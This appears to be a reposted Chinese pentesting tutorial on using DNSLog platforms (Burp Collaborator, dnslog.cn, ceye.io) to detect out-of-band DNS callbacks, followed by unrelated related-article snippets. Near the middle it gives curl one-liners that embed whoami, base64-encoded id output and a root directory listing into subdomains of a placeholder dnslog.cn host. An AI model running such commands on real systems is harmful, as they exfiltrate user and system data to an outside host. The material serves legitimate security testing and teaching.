DNSLog漏洞探测(二)之常用DNSLog平台

news2025/1/18 6:55:25

常用DNSLog平台

我们在上一篇文章中我们介绍了什么是DNSLog,如果我们自己要去搭建一个DNSLog的服务平台,还是比较复杂和麻烦的,所以我们可以直接去使用一些公开免费的DNSLog平台,DNSLog的平台非常的多,但是实际上大部分的DNSLog的平台都是昙花一现,真正意义上稳定持久的就只有那么几个,那么我们接下来给大家介绍几个常用且稳定的DNSLog平台吧。

Burp Collaborator

首先我们从BurpSuite里面自带的一个工具开始讲起,它是集成在BurpSuite工具里面的,非常方便我们去做渗透测试的时候使用。

第一步,我们点击选项菜单栏中的 Project options

在这里插入图片描述

第二步,在 Burp Collaborator Server 选项框中点击 Run health check进行DNSLog服务器连通性的检查

在这里插入图片描述

以下画面是检测正常的情况

在这里插入图片描述

第三步,点击 Burp 选项栏下的 Burp Collaborator client

在这里插入图片描述

进入到以下的界面,点击 Copy to clipboard,复制到粘贴板,这时 BurpSuite的DNSLog服务器会分配给我们一个子域名

在这里插入图片描述

我们打开笔记本,按 CTRL + v 便可以粘贴处分配给我们的子域名

在这里插入图片描述

现在我们打开 cmd ,去 ping 这个分配给我们的子域名地址,并随便加上一点前缀

在这里插入图片描述

然后我们回到页面,点击 Pollnow,

在这里插入图片描述

这时,我们便可以看到DNSLog平台回应给我们的解析记录了

在这里插入图片描述

dnslog.cn

dnslog.cn是我们国内目前最知名的DNSLog服务平台,也是最常用的DNSLog服务平台,注意使用时使用HTTP协议访问,DNSLog的平台

在这里插入图片描述

点击 Get SubDomain获取一个子域名,比如我们这里得到的子域名就是 6rvp56.dnslog.cn

在这里插入图片描述
然后我们打开 cmd 去 ping 这个子域名,这里我们在子域名前面随便加上一点前缀

在这里插入图片描述

这时,我们回到DNSLog的平台,点击 Refresh Record刷新,会发现已经产生了DNSLog的记录

在这里插入图片描述

如果我们想要通过DNSLog平台得到一些系统的信息,那么该怎么办呢?

我们重新点击 Get SubDomain获取一个子域名,比如我们这里得到新的子域名就 j11s5c.dnslog.cn

在这里插入图片描述

然后我们打开 cmd 去 ping 这个子域名,这里我们在子域名前面加上一些前缀,比如%username%

在这里插入图片描述

然后点击 Refresh Record刷新

在这里插入图片描述

这时DNSLog服务平台会响应给我们一些解析记录,比如%username%环境变量

在这里插入图片描述

以下是更多的一些Windows的系统环境变量,大家可以自己实验试试

Windows系统环境变量大全

在这里插入图片描述

在Linux系统下,大家可以使用以下的语句去测试

#获取变量值:
curl http://`whoami`.xxxxxx.dnslog.cn/
#base64编码输出:
curl http://$(id|base64).xxxxxx.dnslog.cn/
#循环获取文件输出:
for i in $(ls /);do curl
"http://$i.xxxxxx.dnslog.cn/";done;

ceye.io

我们在使用dnslog.cn平台时,会发现有两个缺点,一是dnslog.cn平台所使用的解析记录是不持久保存的,一旦我们关闭了该界面,我们的解析记录就会消失,二是dnslog.cn平台只能支持我们去复制粘贴解析记录的结果,没办法大规模解析和提取我们想要的结果,所以,我们现在去使用一个更高级的DNSLog服务解析平台 ceye.io,它是由知道创宇安全公司推出的一款产品,它很好的解决了我们之前提到的两个问题。

ceye.io有以下特点:

一、提供给我们固定子域名,不会变动
二、DNS解析记录会在账号下保存,不会动不动就消失
三、提供在线API,可以使用各种编程语言调用

我们打开主界面点击 Profile 就可以得到我们相应的信息,这里需要我们提前去绑定手机号和邮箱,否则无法使用

在这里插入图片描述

Identifier就是提供给我们的个人固定专属的子域名

在这里插入图片描述

那么我们该如何使用呢?我们现在打开cmd,去 ping 我们的子域名并且随便加上一点前缀

在这里插入图片描述

然后我们在 DNS Query 便可以看到DNS服务器响应给我们的解析记录,这些解析记录可以保存最多6个小时和最近的100条记录

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1299040.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Spring基于xml半注解开发

目录 Component的使用 依赖注解的使用 非自定义Bean的注解开发 Component的使用 基本Bean注解&#xff0c;主要是使用注解的方式替代原有的xml的<bean>标签及其标签属性的配置&#xff0c;使用Component注解替代<bean>标签中的id以及class属性&#xff0c;而对…

奥威亚教学视频应用云平台 VideoCover任意文件上传漏洞复现

0x01 产品简介 广州市奥威亚电子科技有限公司教学视频应用云平台是一个专门为教育机构和个人教师设计的在线学习平台。该平台提供丰富的教学资源和功能,旨在提升教学效果和学习体验。 0x02 漏洞概述 奥威亚教学视频应用云平台 VideoCover.aspx接口处存在任意文件上传漏洞,未…

2.postman环境变量及接口关联

一、环境变量以及全局变量 操作流程 1.点击environment 2.点击environment右侧号&#xff0c;新增环境变量 3.在变量中输入变量名以及变量值 4.回到collection页面&#xff0c;修改变量环境 5.在collection中通过{{变量名}}调用变量 变量定义 环境变量&#xff1a;环境变量…

Xilinx原语详解——IBUFDS OBUFDS

在使用FPGA时&#xff0c;往往会用到一些差分信号&#xff0c;比如HDMI接口&#xff0c;LVDS接口的ADC、显示器等等设备&#xff0c;而FPGA内部往往只会使用单端信号&#xff0c;就需要完成单端信号和差分信号的相互转换&#xff0c;xilinx提供了两个原语对所有IO信号实现差分和…

【基于ESP32无线蓝牙上传电脑Excel透传数据】

【基于ESP32无线蓝牙上传电脑透传数据】 1. 引言2. 环境搭建2.1 硬件准备:2.2 软件准备:2.3. 配置Excel端口接收功能3. 测试代码4. 连接电脑和 ESP324.1 烧录程序4.2 启动蓝牙服务4.3 测试数据透传5. 总结1. 引言 随着物联网技术的发展,越来越多的设备开始支持无线通信,其…

正在快速兴起的云数据架构

云数据架构的日益流行表明了一个主题&#xff1a;在未来几年&#xff0c;越来越多的企业将把他们的数据中心业务完全迁移到云平台上&#xff0c;因为内部部署数据中心设施具有一些固有的优势。数字时代的企业生存已经成为向云迁移的代名词。 云数据架构的日益流行表明了一个主…

Java:字节流 文件输出与读入方法 并 实现文件拷贝

文章目录 字节 流FileOutputStream换行 与 续写FileInputstream实现 文件拷贝&#xff08;字节数组 读入方法&#xff09;字节流 编码 字节 流 FileOutputStream 创建对象&#xff0c;指定位置&#xff08;产生数据传输通道&#xff09; 参数可以是File对象&#xff0c;也可以…

Python time模块详解

time 模块主要包含各种提供日期、时间功能的类和函数。该模块既提供了把日期、时间格式化为字符串的功能&#xff0c;也提供了从字符串恢复日期、时间的功能。 在 Python 的交互式解释器中先导入 time 模块&#xff0c;然后输入 [e for e in dir(time) if not e.startswith(_)…

最简单的基于 FFmpeg 的音频解码器

最简单的基于 FFmpeg 的音频解码器 最简单的基于 FFmpeg 的音频解码器正文参考工程文件下载 参考雷霄骅博士的文章&#xff0c;链接&#xff1a;最简单的基于FFMPEGSDL的音频播放器&#xff1a;拆分-解码器和播放器 最简单的基于 FFmpeg 的音频解码器 正文 FFmpeg 音频解码器…

c++新经典模板与泛型编程:标准库容器中元素类型的萃取

通过容器(数组)类型萃取元素类型 用GetEleType类模板进行常规实现 #include <iostream>#include <vector> #include <list>// 泛化版本 template<typename T> struct GetEleType;// 特化版本 template<typename T> struct GetEleType<std::v…

Elasticsearch:向量数据库的真相

通过工作示例了解什么是向量数据库、它们如何实现 “相似性” 搜索以及它们可以在明显的 LLM 空间之外的哪些地方使用。除非你一直生活在岩石下&#xff0c;否则你可能听说过诸如生成式人工智能和大型语言模型&#xff08;LLM&#xff09;之类的术语。 除此之外&#xff0c;你很…

Rellax.js,一款超酷的 JavaScript 滚动效果库

嗨&#xff0c;大家好&#xff0c;欢迎来到猿镇&#xff0c;我是镇长&#xff0c;lee。 又到了和大家见面的时间&#xff0c;今天和大家分享一款轻松实现视差滚动效果的 JavaScript 库——Rellax.js。无需大量的配置&#xff0c;即可为你的网站增色不少。 什么是Rellax.js&am…

Flutter自定义下拉选择框dropDownMenu

利用PopupMenuButton和PopupMenuItem写了个下拉选择框&#xff0c;之所以不采用系统的&#xff0c;是因为自定义的更能适配项目需求&#xff0c;话不多说&#xff0c;直接看效果 下面直接贴出代码、代码中注释写的都很清楚&#xff0c;使用起来应该很方便&#xff0c;如果有任何…

【完整项目】双模式答题卡识别软件中YOLO模式的训练部分详解,包括训练填涂区域和手写准考证号,手把手详细教学,可延申拓展训练其他图像数据

目录 前言1. 数据准备2. 数据标注3. 先跑起来Windows下用本地的CPU或GPU训练本地Windows系统连接服务器训练前言 前文:【完整项目】基于Python+Tkinter+OpenCV+Yolo+手写OCR的双模式答题卡识别软件的设计与实现 如果你需要训练自己的答题卡模型,那么请先看上面的文章链接。…

uniapp自定义的日历(纯手写)

效果图&#xff1a; html&#xff1a; <!-- 年月 --><view class"box"><view class"box_time"><view class"time"><image click"lefts" :src"url/uploads/20231206/9d1fb520b12383960dca3c214d84fa0…

uniapp图片预览

用的是Uview组件库里面的 直接在页面写上&#xff1a; <u-album singleSize"100" :urls"[https://lxt.jingyi.icu/item.img]"></u-album> 这图片路径是我自己的 你们可以按照组件库里面的方法去实现

掌握JavaScript继承的精髓:原型继承、构造函数继承以及组合继承的实现技巧

​&#x1f308;个人主页&#xff1a;前端青山 &#x1f525;系列专栏&#xff1a;JavaScript篇 &#x1f516;人终将被年少不可得之物困其一生 依旧青山,本期给大家带来JavaScript篇专栏内容:JavaScript-Javascript如何实现继承&#xff1f; 目录 一、是什么 二、实现方式 …

智能优化算法应用:基于蜉蝣算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于蜉蝣算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于蜉蝣算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.蜉蝣算法4.实验参数设定5.算法结果6.参考文献7.MA…

侮辱性涨薪!业绩得了S,调薪涨了450

信安这个行业3年前各大媒体&#xff0c;信安自己人都觉得自己在个朝阳行业&#xff0c;红利在咋弄不得再吃5年。 现在拉个干网络安全的再去问问&#xff0c;看看谁不是去年年终奖砍了一半、或者根本就没了&#xff0c;再或者每天岌岌可危生怕去领大礼包。 原本10月份的激励性…

python变量的命名和使用

变量名只能包含字母、数字和下划线 变量名只能包含字母、数字和下划线。变量名可以字母或下划线打头&#xff0c;但不能以数字打头。例如&#xff0c;可将变量命名为message_1&#xff0c;但不能将其命名为1_message。 Python 语言中&#xff0c;以下划线开头的标识符有特殊含…